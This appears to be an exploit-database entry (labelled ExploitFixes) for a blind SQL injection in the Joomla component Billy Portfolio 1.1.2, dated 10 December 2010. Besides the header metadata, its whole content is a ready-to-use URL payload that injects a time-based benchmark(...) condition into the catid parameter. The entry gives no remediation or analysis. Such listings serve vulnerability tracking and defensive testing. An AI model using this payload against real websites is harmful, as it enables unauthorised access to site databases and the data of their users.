ExploitFixes
Joomla Component Billy Portfolio 1.1.2 Blind SQL Injection 2010-12-10 15:15:15

# Exploit Title: Joomla Component Billy Portfolio 1.1.2 Blind SQL Injection
# Date: 10 Dec 2010
# Author: jdc
# Software Link: http://extensions.joomla.org/extensions/directory-a-documentation/portfolio/14834
# Version: 1.1.2

index.php?option=com_billyportfolio&view=billyportfoliocatid=-1 and
if(1,benchmark(5000000,md5(1)),1)